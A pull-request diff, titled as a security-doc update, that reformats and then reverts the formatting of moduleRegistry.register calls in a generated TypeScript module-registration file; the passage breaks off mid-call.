### PR TITLE
doc(secrutiy): update the security doc

### DIFF
--- a/console/src/plugins/generated/registerHostModules.ts
+++ b/console/src/plugins/generated/registerHostModules.ts
@@ -181,29 +181,14 @@ export function registerHostModules(): void {
   moduleRegistry.register("Agent/ACP/components/ACPCard", __mod0__);
   moduleRegistry.register("Agent/ACP/components/ACPDrawer", __mod1__);
   moduleRegistry.register("Agent/ACP/index", __mod2__);
-  moduleRegistry.register(
-    "Agent/Config/components/ContextCompactCard",
-    __mod3__,
-  );
-  moduleRegistry.register(
-    "Agent/Config/components/EmbeddingConfigCard",
-    __mod4__,
-  );
-  moduleRegistry.register(
-    "Agent/Config/components/LlmRateLimiterCard",
-    __mod5__,
-  );
+  moduleRegistry.register("Agent/Config/components/ContextCompactCard", __mod3__);
+  moduleRegistry.register("Agent/Config/components/EmbeddingConfigCard", __mod4__);
+  moduleRegistry.register("Agent/Config/components/LlmRateLimiterCard", __mod5__);
   moduleRegistry.register("Agent/Config/components/LlmRetryCard", __mod6__);
-  moduleRegistry.register(
-    "Agent/Config/components/MemorySummaryCard",
-    __mod7__,
-  );
+  moduleRegistry.register("Agent/Config/components/MemorySummaryCard", __mod7__);
   moduleRegistry.register("Agent/Config/components/ReactAgentCard", __mod8__);
   moduleRegistry.register("Agent/Config/components/SliderWithValue", __mod9__);
-  moduleRegistry.register(
-    "Agent/Config/components/ToolResultCompactCard",
-    __mod10__,
-  );
+  moduleRegistry.register("Agent/Config/components/ToolResultCompactCard", __mod10__);
   moduleRegistry.register("Agent/Config/components/index", __mod11__);
   moduleRegistry.register("Agent/Config/index", __mod12__);
   moduleRegistry.register("Agent/Config/useAgentConfig", __mod13__);
@@ -213,24 +198,15 @@ export function registerHostModules(): void {
   moduleRegistry.register("Agent/MCP/useMCP", __mod17__);
   moduleRegistry.register("Agent/Skills/components/HeaderActions", __mod18__);
   moduleRegistry.register("Agent/Skills/components/ImportHubModal", __mod19__);
-  moduleRegistry.register(
-    "Agent/Skills/components/PoolTransferModal",
-    __mod20__,
-  );
+  moduleRegistry.register("Agent/Skills/components/PoolTransferModal", __mod20__);
   moduleRegistry.register("Agent/Skills/components/SkillCard", __mod21__);
   moduleRegistry.register("Agent/Skills/components/SkillDrawer", __mod22__);
-  moduleRegistry.register(
-    "Agent/Skills/components/SkillFilterDropdown",
-    __mod23__,
-  );
+  moduleRegistry.register("Agent/Skills/components/SkillFilterDropdown", __mod23__);
   moduleRegistry.register("Agent/Skills/components/SkillListItem", __mod24__);
   moduleRegistry.register("Agent/Skills/components/SkillsToolbar", __mod25__);
   moduleRegistry.register("Agent/Skills/components/index", __mod26__);
   moduleRegistry.register("Agent/Skills/components/skillMetadata", __mod27__);
-  moduleRegistry.register(
-    "Agent/Skills/components/useConflictRenameModal",
-    __mod28__,
-  );
+  moduleRegistry.register("Agent/Skills/components/useConflictRenameModal", __mod28__);
   moduleRegistry.register("Agent/Skills/index", __mod29__);
   moduleRegistry.register("Agent/Skills/useSkillFilter", __mod30__);
   moduleRegistry.register("Agent/Skills/useSkills", __mod31__);
@@ -239,15 +215,9 @@ export function registerHostModules(): void {
   moduleRegistry.register("Agent/Tools/useTools", __mod34__);
   moduleRegistry.register("Agent/Workspace/components/FileEditor", __mod35__);
   moduleRegistry.register("Agent/Workspace/components/FileItem", __mod36__);
-  moduleRegistry.register(
-    "Agent/Workspace/components/FileListPanel",
-    __mod37__,
-  );
+  moduleRegistry.register("Agent/Workspace/components/FileListPanel", __mod37__);
   moduleRegistry.register("Agent/Workspace/components/index", __mod38__);
-  moduleRegistry.register(
-    "Agent/Workspace/components/useAgentsData",
-    __mod39__,
-  );
+  moduleRegistry.register("Agent/Workspace/components/useAgentsData", __mod39__);
   moduleRegistry.register("Agent/Workspace/components/utils", __mod40__);
   moduleRegistry.register("Agent/Workspace/index", __mod41__);
   moduleRegistry.register("Chat/ModelSelector/index", __mod42__);
@@ -256,29 +226,17 @@ export function registerHostModules(): void {
   moduleRegistry.register("Chat/components/ChatHeaderTitle/index", __mod45__);
   moduleRegistry.register("Chat/components/ChatSearchPanel/index", __mod46__);
   moduleRegistry.register("Chat/components/ChatSessionDrawer/index", __mod47__);
-  moduleRegistry.register(
-    "Chat/components/ChatSessionInitializer/index",
-    __mod48__,
-  );
+  moduleRegistry.register("Chat/components/ChatSessionInitializer/index", __mod48__);
   moduleRegistry.register("Chat/components/ChatSessionItem/index", __mod49__);
   moduleRegistry.register("Chat/index", __mod50__);
   moduleRegistry.register("Chat/sessionApi/index", __mod51__);
   moduleRegistry.register("Chat/utils", __mod52__);
   moduleRegistry.register("Control/Channels/components/ChannelCard", __mod53__);
-  moduleRegistry.register(
-    "Control/Channels/components/ChannelDrawer",
-    __mod54__,
-  );
-  moduleRegistry.register(
-    "Control/Channels/components/channelIcons",
-    __mod55__,
-  );
+  moduleRegistry.register("Control/Channels/components/ChannelDrawer", __mod54__);
+  moduleRegistry.register("Control/Channels/components/channelIcons", __mod55__);
   moduleRegistry.register("Control/Channels/components/constants", __mod56__);
   moduleRegistry.register("Control/Channels/components/index", __mod57__);
-  moduleRegistry.register(
-    "Control/Channels/components/useChannelQrcode",
-    __mod58__,
-  );
+  moduleRegistry.register("Control/Channels/components/useChannelQrcode", __mod58__);
   moduleRegistry.register("Control/Channels/index", __mod59__);
   moduleRegistry.register("Control/Channels/useChannels", __mod60__);
   moduleRegistry.register("Control/CronJobs/components/JobDrawer", __mod61__);
@@ -291,10 +249,7 @@ export function registerHostModules(): void {
   moduleRegistry.register("Control/Heartbeat/index", __mod68__);
   moduleRegistry.register("Control/Heartbeat/parseEvery", __mod69__);
   moduleRegistry.register("Control/Sessions/components/FilterBar", __mod70__);
-  moduleRegistry.register(
-    "Control/Sessions/components/SessionDrawer",
-    __mod71__,
-  );
+  moduleRegistry.register("Control/Sessions/components/SessionDrawer", __mod71__);
   moduleRegistry.register("Control/Sessions/components/columns", __mod72__);
   moduleRegistry.register("Control/Sessions/components/constants", __mod73__);
   moduleRegistry.register("Control/Sessions/components/index", __mod74__);
@@ -305,242 +260,92 @@ export function registerHostModules(): void {
   moduleRegistry.register("Settings/AgentStats/index", __mod79__);
   moduleRegistry.register("Settings/Agents/components/AgentModal", __mod80__);
   moduleRegistry.register("Settings/Agents/components/AgentTable", __mod81__);
-  moduleRegistry.register(
-    "Settings/Agents/components/SortableAgentRow",
-    __mod82__,
-  );
+  moduleRegistry.register("Settings/Agents/components/SortableAgentRow", __mod82__);
   moduleRegistry.register("Settings/Agents/components/index", __mod83__);
   moduleRegistry.register("Settings/Agents/index", __mod84__);
   moduleRegistry.register("Settings/Agents/reorder", __mod85__);
   moduleRegistry.register("Settings/Agents/useAgents", __mod86__);
-  moduleRegistry.register(
-    "Settings/Backups/create/AgentMultiSelect",
-    __mod87__,
-  );
+  moduleRegistry.register("Settings/Backups/create/AgentMultiSelect", __mod87__);
   moduleRegistry.register("Settings/Backups/create/BackupProgress", __mod88__);
   moduleRegistry.register("Settings/Backups/create/BackupScopeForm", __mod89__);
-  moduleRegistry.register(
-    "Settings/Backups/create/CreateBackupModal",
-    __mod90__,
-  );
-  moduleRegistry.register(
-    "Settings/Backups/create/SilentBackupModal",
-    __mod91__,
-  );
+  moduleRegistry.register("Settings/Backups/create/CreateBackupModal", __mod90__);
+  moduleRegistry.register("Settings/Backups/create/SilentBackupModal", __mod91__);
   moduleRegistry.register("Settings/Backups/import/ImportButton", __mod92__);
-  moduleRegistry.register(
-    "Settings/Backups/import/ImportConflictModal",
-    __mod93__,
-  );
+  moduleRegistry.register("Settings/Backups/import/ImportConflictModal", __mod93__);
   moduleRegistry.register("Settings/Backups/import/useImportFlow", __mod94__);
   moduleRegistry.register("Settings/Backups/index", __mod95__);
   moduleRegistry.register("Settings/Backups/list/BackupTable", __mod96__);
   moduleRegistry.register("Settings/Backups/list/BackupToolbar", __mod97__);
   moduleRegistry.register("Settings/Backups/list/ScopeTags", __mod98__);
-  moduleRegistry.register(
-    "Settings/Backups/restore/PreRestoreConfirmModal",
-    __mod99__,
-  );
-  moduleRegistry.register(
-    "Settings/Backups/restore/RestoreAgentTable",
-    __mod100__,
-  );
-  moduleRegistry.register(
-    "Settings/Backups/restore/RestoreBackupModal",
-    __mod101__,
-  );
-  moduleRegistry.register(
-    "Settings/Backups/restore/useRestoreFlow",
-    __mod102__,
-  );
+  moduleRegistry.register("Settings/Backups/restore/PreRestoreConfirmModal", __mod99__);
+  moduleRegistry.register("Settings/Backups/restore/RestoreAgentTable", __mod100__);
+  moduleRegistry.register("Settings/Backups/restore/RestoreBackupModal", __mod101__);
+  moduleRegistry.register("Settings/Backups/restore/useRestoreFlow", __mod102__);
   moduleRegistry.register("Settings/Backups/shared/progress", __mod103__);
   moduleRegistry.register("Settings/Backups/shared/scope", __mod104__);
-  moduleRegistry.register(
-    "Settings/Backups/shared/useBackupRunner",
-    __mod105__,
-  );
+  moduleRegistry.register("Settings/Backups/shared/useBackupRunner", __mod105__);
   moduleRegistry.register("Settings/Debug/components/LogViewer", __mod106__);
   moduleRegistry.register("Settings/Debug/components/index", __mod107__);
   moduleRegistry.register("Settings/Debug/index", __mod108__);
   moduleRegistry.register("Settings/Debug/useDebugLogs", __mod109__);
-  moduleRegistry.register(
-    "Settings/Environments/components/AddButton",
-    __mod110__,
-  );
-  moduleRegistry.register(
-    "Settings/Environments/components/EmptyState",
-    __mod111__,
-  );
-  moduleRegistry.register(
-    "Settings/Environments/components/EnvRow",
-    __mod112__,
-  );
-  moduleRegistry.register(
-    "Settings/Environments/components/Toolbar",
-    __mod113__,
-  );
+  moduleRegistry.register("Settings/Environments/components/AddButton", __mod110__);
+  moduleRegistry.register("Settings/Environments/components/EmptyState", __mod111__);
+  moduleRegistry.register("Settings/Environments/components/EnvRow", __mod112__);
+  moduleRegistry.register("Settings/Environments/components/Toolbar", __mod113__);
   moduleRegistry.register("Settings/Environments/components/index", __mod114__);
   moduleRegistry.register("Settings/Environments/index", __mod115__);
   moduleRegistry.register("Settings/Environments/useEnvVars", __mod116__);
-  moduleRegistry.register(
-    "Settings/Models/components/cards/LocalProviderCard",
-    __mod117__,
-  );
-  moduleRegistry.register(
-    "Settings/Models/components/cards/ProviderCard",
-    __mod118__,
-  );
-  moduleRegistry.register(
-    "Settings/Models/components/cards/RemoteProviderCard",
-    __mod119__,
-  );
+  moduleRegistry.register("Settings/Models/components/cards/LocalProviderCard", __mod117__);
+  moduleRegistry.register("Settings/Models/components/cards/ProviderCard", __mod118__);
+  moduleRegistry.register("Settings/Models/components/cards/RemoteProviderCard", __mod119__);
   moduleRegistry.register("Settings/Models/components/cards/index", __mod120__);
   moduleRegistry.register("Settings/Models/components/index", __mod121__);
-  moduleRegistry.register(
-    "Settings/Models/components/modals/CustomProviderModal",
-    __mod122__,
-  );
-  moduleRegistry.register(
-    "Settings/Models/components/modals/JsonConfigEditor",
-    __mod123__,
-  );
-  moduleRegistry.register(
-    "Settings/Models/components/modals/LocalModelManageModal",
-    __mod124__,
-  );
-  moduleRegistry.register(
-    "Settings/Models/components/modals/ModelManageModal",
-    __mod125__,
-  );
-  moduleRegistry.register(
-    "Settings/Models/components/modals/OpenRouterFilterSection",
-    __mod126__,
-  );
-  moduleRegistry.register(
-    "Settings/Models/components/modals/ProviderConfigModal",
-    __mod127__,
-  );
-  moduleRegistry.register(
-    "Settings/Models/components/modals/RemoteModelManageModal",
-    __mod128__,
-  );
-  moduleRegistry.register(
-    "Settings/Models/components/modals/index",
-    __mod129__,
-  );
-  moduleRegistry.register(
-    "Settings/Models/components/modals/local-models/LocalModelRow",
-    __mod130__,
-  );
-  moduleRegistry.register(
-    "Settings/Models/components/modals/local-models/LocalRuntimePanel",
-    __mod131__,
-  );
-  moduleRegistry.register(
-    "Settings/Models/components/modals/local-models/shared",
-    __mod132__,
-  );
-  moduleRegistry.register(
-    "Settings/Models/components/modals/testConnectionMessage",
-    __mod133__,
-  );
-  moduleRegistry.register(
-    "Settings/Models/components/providerIcon",
-    __mod134__,
-  );
-  moduleRegistry.register(
-    "Settings/Models/components/sections/LoadingState",
-    __mod135__,
-  );
-  moduleRegistry.register(
-    "Settings/Models/components/sections/ModelsSection",
-    __mod136__,
-  );
-  moduleRegistry.register(
-    "Settings/Models/components/sections/index",
-    __mod137__,
-  );
+  moduleRegistry.register("Settings/Models/components/modals/CustomProviderModal", __mod122__);
+  moduleRegistry.register("Settings/Models/components/modals/JsonConfigEditor", __mod123__);
+  moduleRegistry.register("Settings/Models/components/modals/LocalModelManageModal", __mod124__);
+  moduleRegistry.register("Settings/Models/components/modals/ModelManageModal", __mod125__);
+  moduleRegistry.register("Settings/Models/components/modals/OpenRouterFilterSection", __mod126__);
+  moduleRegistry.register("Settings/Models/components/modals/ProviderConfigModal", __mod127__);
+  moduleRegistry.register("Settings/Models/components/modals/RemoteModelManageModal", __mod128__);
+  moduleRegistry.register("Settings/Models/components/modals/index", __mod129__);
+  moduleRegistry.register("Settings/Models/components/modals/local-models/LocalModelRow", __mod130__);
+  moduleRegistry.register("Settings/Models/components/modals/local-models/LocalRuntimePanel", __mod131__);
+  moduleRegistry.register("Settings/Models/components/modals/local-models/shared", __mod132__);
+  moduleRegistry.register("Settings/Models/components/modals/testConnectionMessage", __mod133__);
+  moduleRegistry.register("Settings/Models/components/providerIcon", __mod134__);
+  moduleRegistry.register("Settings/Models/components/sections/LoadingState", __mod135__);
+  moduleRegistry.register("Settings/Models/components/sections/ModelsSection", __mod136__);
+  moduleRegistry.register("Settings/Models/components/sections/index", __mod137__);
   moduleRegistry.register("Settings/Models/index", __mod138__);
   moduleRegistry.register("Settings/Models/useProviders", __mod139__);
-  moduleRegistry.register(
-    "Settings/Security/components/FileGuardSection",
-    __mod140__,
-  );
-  moduleRegistry.register(
-    "Settings/Security/components/PreviewModal",
-    __mod141__,
-  );
+  moduleRegistry.register("Settings/Security/components/FileGuardSection", __mod140__);
+  moduleRegistry.register("Settings/Security/components/PreviewModal", __mod141__);
   moduleRegistry.register("Settings/Security/components/RuleModal", __mod142__);
   moduleRegistry.register("Settings/Security/components/RuleTable", __mod143__);
-  moduleRegistry.register(
-    "Settings/Security/components/SkillScannerSection",
-    __mod144__,
-  );
+  moduleRegistry.register("Settings/Security/components/SkillScannerSection", __mod144__);
   moduleRegistry.register("Settings/Security/components/index", __mod145__);
   moduleRegistry.register("Settings/Security/index", __mod146__);
   moduleRegistry.register("Settings/Security/useSkillScanner", __mod147__);
   moduleRegistry.register("Settings/Security/useToolGuard", __mod148__);
   moduleRegistry.register("Settings/SkillPool/builtinNotice", __mod149__);
-  moduleRegistry.register(
-    "Settings/SkillPool/components/BroadcastModal",
-    __mod150__,
-  );
-  moduleRegistry.register(
-    "Settings/SkillPool/components/ImportBuiltinModal",
-    __mod151__,
-  );
-  moduleRegistry.register(
-    "Settings/SkillPool/components/PoolSkillCard",
-    __mod152__,
-  );
-  moduleRegistry.register(
-    "Settings/SkillPool/components/PoolSkillDrawer",
-    __mod153__,
-  );
-  moduleRegistry.register(
-    "Settings/SkillPool/components/PoolSkillListItem",
-    __mod154__,
-  );
-  moduleRegistry.register(
-    "Settings/SkillPool/components/SkillMeta",
-    __mod155__,
-  );
-  moduleRegistry.register(
-    "Settings/SkillPool/components/SkillPoolListItem",
-    __mod156__,
-  );
+  moduleRegistry.register("Settings/SkillPool/components/BroadcastModal", __mod150__);
+  moduleRegistry.register("Settings/SkillPool/components/ImportBuiltinModal", __mod151__);
+  moduleRegistry.register("Settings/SkillPool/components/PoolSkillCard", __mod152__);
+  moduleRegistry.register("Settings/SkillPool/components/PoolSkillDrawer", __mod153__);
+  moduleRegistry.register("Settings/SkillPool/components/PoolSkillListItem", __mod154__);
+  moduleRegistry.register("Settings/SkillPool/components/SkillMeta", __mod155__);
+  moduleRegistry.register("Settings/SkillPool/components/SkillPoolListItem", __mod156__);
   moduleRegistry.register("Settings/SkillPool/components/index", __mod157__);
   moduleRegistry.register("Settings/SkillPool/index", __mod158__);
   moduleRegistry.register("Settings/SkillPool/useSkillPool", __mod159__);
-  moduleRegistry.register(
-    "Settings/TokenUsage/components/EmptyState",
-    __mod160__,
-  );
-  moduleRegistry.register(
-    "Settings/TokenUsage/components/LoadingState",
-    __mod161__,
-  );
+  moduleRegistry.register("Settings/TokenUsage/components/EmptyState", __mod160__);
+  moduleRegistry.register("Settings/TokenUsage/components/LoadingState", __mod161__);
   moduleRegistry.register("Settings/TokenUsage/components/index", __mod162__);
   moduleRegistry.register("Settings/TokenUsage/index", __mod163__);
-  moduleRegistry.register(
-    "Settings/VoiceTranscription/components/AudioModeCard",
-    __mod164__,
-  );
-  moduleRegistry.register(
-    "Settings/VoiceTranscription/components/ProviderSelectCard",
-    __mod165__,
-  );
-  moduleRegistry.register(
-    "Settings/VoiceTranscription/components/ProviderTypeCard",
-    __mod166__,
-  );
-  moduleRegistry.register(
-    "Settings/VoiceTranscription/components/index",
-    __mod167__,
-  );
+  moduleRegistry.register("Settings/VoiceTranscription/components/AudioModeCard", __mod164__);
+  moduleRegistry.register("Settings/VoiceTranscription/components/ProviderSelectCard", __mod165__);
+  moduleRegistry.register("Settings/VoiceTranscription/components/ProviderTypeCard", __mod166__);
+  moduleRegistry.register("Settings/VoiceTranscription/components/index", __mod167__);
   moduleRegistry.register("Settings/VoiceTranscription/index", __mod168__);
-  moduleRegistry.register(
-    "Settings/VoiceTranscription/useVoiceTranscription",
-    __mod169__,
-  );
+  moduleRegistry.register("Settings/VoiceTranscription/useVoiceTranscription", __mod169__);
 }

--- a/console/src/plugins/generated/registerHostModules.ts
+++ b/console/src/plugins/generated/registerHostModules.ts
@@ -181,14 +181,29 @@ export function registerHostModules(): void {
   moduleRegistry.register("Agent/ACP/components/ACPCard", __mod0__);
   moduleRegistry.register("Agent/ACP/components/ACPDrawer", __mod1__);
   moduleRegistry.register("Agent/ACP/index", __mod2__);
-  moduleRegistry.register("Agent/Config/components/ContextCompactCard", __mod3__);
-  moduleRegistry.register("Agent/Config/components/EmbeddingConfigCard", __mod4__);
-  moduleRegistry.register("Agent/Config/components/LlmRateLimiterCard", __mod5__);
+  moduleRegistry.register(
+    "Agent/Config/components/ContextCompactCard",
+    __mod3__,
+  );
+  moduleRegistry.register(
+    "Agent/Config/components/EmbeddingConfigCard",
+    __mod4__,
+  );
+  moduleRegistry.register(
+    "Agent/Config/components/LlmRateLimiterCard",
+    __mod5__,
+  );
   moduleRegistry.register("Agent/Config/components/LlmRetryCard", __mod6__);
-  moduleRegistry.register("Agent/Config/components/MemorySummaryCard", __mod7__);
+  moduleRegistry.register(
+    "Agent/Config/components/MemorySummaryCard",
+    __mod7__,
+  );
   moduleRegistry.register("Agent/Config/components/ReactAgentCard", __mod8__);
   moduleRegistry.register("Agent/Config/components/SliderWithValue", __mod9__);
-  moduleRegistry.register("Agent/Config/components/ToolResultCompactCard", __mod10__);
+  moduleRegistry.register(
+    "Agent/Config/components/ToolResultCompactCard",
+    __mod10__,
+  );
   moduleRegistry.register("Agent/Config/components/index", __mod11__);
   moduleRegistry.register("Agent/Config/index", __mod12__);
   moduleRegistry.register("Agent/Config/useAgentConfig", __mod13__);
@@ -198,15 +213,24 @@ export function registerHostModules(): void {
   moduleRegistry.register("Agent/MCP/useMCP", __mod17__);
   moduleRegistry.register("Agent/Skills/components/HeaderActions", __mod18__);
   moduleRegistry.register("Agent/Skills/components/ImportHubModal", __mod19__);
-  moduleRegistry.register("Agent/Skills/components/PoolTransferModal", __mod20__);
+  moduleRegistry.register(
+    "Agent/Skills/components/PoolTransferModal",
+    __mod20__,
+  );
   moduleRegistry.register("Agent/Skills/components/SkillCard", __mod21__);
   moduleRegistry.register("Agent/Skills/components/SkillDrawer", __mod22__);
-  moduleRegistry.register("Agent/Skills/components/SkillFilterDropdown", __mod23__);
+  moduleRegistry.register(
+    "Agent/Skills/components/SkillFilterDropdown",
+    __mod23__,
+  );
   moduleRegistry.register("Agent/Skills/components/SkillListItem", __mod24__);
   moduleRegistry.register("Agent/Skills/components/SkillsToolbar", __mod25__);
   moduleRegistry.register("Agent/Skills/components/index", __mod26__);
   moduleRegistry.register("Agent/Skills/components/skillMetadata", __mod27__);
-  moduleRegistry.register("Agent/Skills/components/useConflictRenameModal", __mod28__);
+  moduleRegistry.register(
+    "Agent/Skills/components/useConflictRenameModal",
+    __mod28__,
+  );
   moduleRegistry.register("Agent/Skills/index", __mod29__);
   moduleRegistry.register("Agent/Skills/useSkillFilter", __mod30__);
   moduleRegistry.register("Agent/Skills/useSkills", __mod31__);
@@ -215,9 +239,15 @@ export function registerHostModules(): void {
   moduleRegistry.register("Agent/Tools/useTools", __mod34__);
   moduleRegistry.register("Agent/Workspace/components/FileEditor", __mod35__);
   moduleRegistry.register("Agent/Workspace/components/FileItem", __mod36__);
-  moduleRegistry.register("Agent/Workspace/components/FileListPanel", __mod37__);
+  moduleRegistry.register(
+    "Agent/Workspace/components/FileListPanel",
+    __mod37__,
+  );
   moduleRegistry.register("Agent/Workspace/components/index", __mod38__);
-  moduleRegistry.register("Agent/Workspace/components/useAgentsData", __mod39__);
+  moduleRegistry.register(
+    "Agent/Workspace/components/useAgentsData",
+    __mod39__,
+  );
   moduleRegistry.register("Agent/Workspace/components/utils", __mod40__);
   moduleRegistry.register("Agent/Workspace/index", __mod41__);
   moduleRegistry.register("Chat/ModelSelector/index", __mod42__);
@@ -226,17 +256,29 @@ export function registerHostModules(): void {
   moduleRegistry.register("Chat/components/ChatHeaderTitle/index", __mod45__);
   moduleRegistry.register("Chat/components/ChatSearchPanel/index", __mod46__);
   moduleRegistry.register("Chat/components/ChatSessionDrawer/index", __mod47__);
-  moduleRegistry.register("Chat/components/ChatSessionInitializer/index", __mod48__);
+  moduleRegistry.register(
+    "Chat/components/ChatSessionInitializer/index",
+    __mod48__,
+  );
   moduleRegistry.register("Chat/components/ChatSessionItem/index", __mod49__);
   moduleRegistry.register("Chat/index", __mod50__);
   moduleRegistry.register("Chat/sessionApi/index", __mod51__);
   moduleRegistry.register("Chat/utils", __mod52__);
   moduleRegistry.register("Control/Channels/components/ChannelCard", __mod53__);
-  moduleRegistry.register("Control/Channels/components/ChannelDrawer", __mod54__);
-  moduleRegistry.register("Control/Channels/components/channelIcons", __mod55__);
+  moduleRegistry.register(
+    "Control/Channels/components/ChannelDrawer",
+    __mod54__,
+  );
+  moduleRegistry.register(
+    "Control/Channels/components/channelIcons",
+    __mod55__,
+  );
   moduleRegistry.register("Control/Channels/components/constants", __mod56__);
   moduleRegistry.register("Control/Channels/components/index", __mod57__);
-  moduleRegistry.register("Control/Channels/components/useChannelQrcode", __mod58__);
+  moduleRegistry.register(
+    "Control/Channels/components/useChannelQrcode",
+    __mod58__,
+  );
   moduleRegistry.register("Control/Channels/index", __mod59__);
   moduleRegistry.register("Control/Channels/useChannels", __mod60__);
   moduleRegistry.register("Control/CronJobs/components/JobDrawer", __mod61__);
@@ -249,7 +291,10 @@ export function registerHostModules(): void {
   moduleRegistry.register("Control/Heartbeat/index", __mod68__);
   moduleRegistry.register("Control/Heartbeat/parseEvery", __mod69__);
   moduleRegistry.register("Control/Sessions/components/FilterBar", __mod70__);
-  moduleRegistry.register("Control/Sessions/components/SessionDrawer", __mod71__);
+  moduleRegistry.register(
+    "Control/Sessions/components/SessionDrawer",
+    __mod71__,
+  );
   moduleRegistry.register("Control/Sessions/components/columns", __mod72__);
   moduleRegistry.register("Control/Sessions/components/constants", __mod73__);
   moduleRegistry.register("Control/Sessions/components/index", __mod74__);
@@ -260,92 +305,242 @@ export function registerHostModules(): void {
   moduleRegistry.register("Settings/AgentStats/index", __mod79__);
   moduleRegistry.register("Settings/Agents/components/AgentModal", __mod80__);
   moduleRegistry.register("Settings/Agents/components/AgentTable", __mod81__);
-  moduleRegistry.register("Settings/Agents/components/SortableAgentRow", __mod82__);
+  moduleRegistry.register(
+    "Settings/Agents/components/SortableAgentRow",
+    __mod82__,
+  );
   moduleRegistry.register("Settings/Agents/components/index", __mod83__);
   moduleRegistry.register("Settings/Agents/index", __mod84__);
   moduleRegistry.register("Settings/Agents/reorder", __mod85__);
   moduleRegistry.register("Settings/Agents/useAgents", __mod86__);
-  moduleRegistry.register("Settings/Backups/create/AgentMultiSelect", __mod87__);
+  moduleRegistry.register(
+    "Settings/Backups/create/AgentMultiSelect",
+    __mod87__,
+  );
   moduleRegistry.register("Settings/Backups/create/BackupProgress", __mod88__);
   moduleRegistry.register("Settings/Backups/create/BackupScopeForm", __mod89__);
-  moduleRegistry.register("Settings/Backups/create/CreateBackupModal", __mod90__);
-  moduleRegistry.register("Settings/Backups/create/SilentBackupModal", __mod91__);
+  moduleRegistry.register(
+    "Settings/Backups/create/CreateBackupModal",
+    __mod90__,
+  );
+  moduleRegistry.register(
+    "Settings/Backups/create/SilentBackupModal",
+    __mod91__,
+  );
   moduleRegistry.register("Settings/Backups/import/ImportButton", __mod92__);
-  moduleRegistry.register("Settings/Backups/import/ImportConflictModal", __mod93__);
+  moduleRegistry.register(
+    "Settings/Backups/import/ImportConflictModal",
+    __mod93__,
+  );
   moduleRegistry.register("Settings/Backups/import/useImportFlow", __mod94__);
   moduleRegistry.register("Settings/Backups/index", __mod95__);
   moduleRegistry.register("Settings/Backups/list/BackupTable", __mod96__);
   moduleRegistry.register("Settings/Backups/list/BackupToolbar", __mod97__);
   moduleRegistry.register("Settings/Backups/list/ScopeTags", __mod98__);
-  moduleRegistry.register("Settings/Backups/restore/PreRestoreConfirmModal", __mod99__);
-  moduleRegistry.register("Settings/Backups/restore/RestoreAgentTable", __mod100__);
-  moduleRegistry.register("Settings/Backups/restore/RestoreBackupModal", __mod101__);
-  moduleRegistry.register("Settings/Backups/restore/useRestoreFlow", __mod102__);
+  moduleRegistry.register(
+    "Settings/Backups/restore/PreRestoreConfirmModal",
+    __mod99__,
+  );
+  moduleRegistry.register(
+    "Settings/Backups/restore/RestoreAgentTable",
+    __mod100__,
+  );
+  moduleRegistry.register(
+    "Settings/Backups/restore/RestoreBackupModal",
+    __mod101__,
+  );
+  moduleRegistry.register(
+    "Settings/Backups/restore/useRestoreFlow",
+    __mod102__,
+  );
   moduleRegistry.register("Settings/Backups/shared/progress", __mod103__);
   moduleRegistry.register("Settings/Backups/shared/scope", __mod104__);
-  moduleRegistry.register("Settings/Backups/shared/useBackupRunner", __mod105__);
+  moduleRegistry.register(
+    "Settings/Backups/shared/useBackupRunner",
+    __mod105__,
+  );
   moduleRegistry.register("Settings/Debug/components/LogViewer", __mod106__);
   moduleRegistry.register("Settings/Debug/components/index", __mod107__);
   moduleRegistry.register("Settings/Debug/index", __mod108__);
   moduleRegistry.register("Settings/Debug/useDebugLogs", __mod109__);
-  moduleRegistry.register("Settings/Environments/components/AddButton", __mod110__);
-  moduleRegistry.register("Settings/Environments/components/EmptyState", __mod111__);
-  moduleRegistry.register("Settings/Environments/components/EnvRow", __mod112__);
-  moduleRegistry.register("Settings/Environments/components/Toolbar", __mod113__);
+  moduleRegistry.register(
+    "Settings/Environments/components/AddButton",
+    __mod110__,
+  );
+  moduleRegistry.register(
+    "Settings/Environments/components/EmptyState",
+    __mod111__,
+  );
+  moduleRegistry.register(
+    "Settings/Environments/components/EnvRow",
+    __mod112__,
+  );
+  moduleRegistry.register(
+    "Settings/Environments/components/Toolbar",
+    __mod113__,
+  );
   moduleRegistry.register("Settings/Environments/components/index", __mod114__);
   moduleRegistry.register("Settings/Environments/index", __mod115__);
   moduleRegistry.register("Settings/Environments/useEnvVars", __mod116__);
-  moduleRegistry.register("Settings/Models/components/cards/LocalProviderCard", __mod117__);
-  moduleRegistry.register("Settings/Models/components/cards/ProviderCard", __mod118__);
-  moduleRegistry.register("Settings/Models/components/cards/RemoteProviderCard", __mod119__);
+  moduleRegistry.register(
+    "Settings/Models/components/cards/LocalProviderCard",
+    __mod117__,
+  );
+  moduleRegistry.register(
+    "Settings/Models/components/cards/ProviderCard",
+    __mod118__,
+  );
+  moduleRegistry.register(
+    "Settings/Models/components/cards/RemoteProviderCard",
+    __mod119__,
+  );
   moduleRegistry.register("Settings/Models/components/cards/index", __mod120__);
   moduleRegistry.register("Settings/Models/components/index", __mod121__);
-  moduleRegistry.register("Settings/Models/components/modals/CustomProviderModal", __mod122__);
-  moduleRegistry.register("Settings/Models/components/modals/JsonConfigEditor", __mod123__);
-  moduleRegistry.register("Settings/Models/components/modals/LocalModelManageModal", __mod124__);
-  moduleRegistry.register("Settings/Models/components/modals/ModelManageModal", __mod125__);
-  moduleRegistry.register("Settings/Models/components/modals/OpenRouterFilterSection", __mod126__);
-  moduleRegistry.register("Settings/Models/components/modals/ProviderConfigModal", __mod127__);
-  moduleRegistry.register("Settings/Models/components/modals/RemoteModelManageModal", __mod128__);
-  moduleRegistry.register("Settings/Models/components/modals/index", __mod129__);
-  moduleRegistry.register("Settings/Models/components/modals/local-models/LocalModelRow", __mod130__);
-  moduleRegistry.register("Settings/Models/components/modals/local-models/LocalRuntimePanel", __mod131__);
-  moduleRegistry.register("Settings/Models/components/modals/local-models/shared", __mod132__);
-  moduleRegistry.register("Settings/Models/components/modals/testConnectionMessage", __mod133__);
-  moduleRegistry.register("Settings/Models/components/providerIcon", __mod134__);
-  moduleRegistry.register("Settings/Models/components/sections/LoadingState", __mod135__);
-  moduleRegistry.register("Settings/Models/components/sections/ModelsSection", __mod136__);
-  moduleRegistry.register("Settings/Models/components/sections/index", __mod137__);
+  moduleRegistry.register(
+    "Settings/Models/components/modals/CustomProviderModal",
+    __mod122__,
+  );
+  moduleRegistry.register(
+    "Settings/Models/components/modals/JsonConfigEditor",
+    __mod123__,
+  );
+  moduleRegistry.register(
+    "Settings/Models/components/modals/LocalModelManageModal",
+    __mod124__,
+  );
+  moduleRegistry.register(
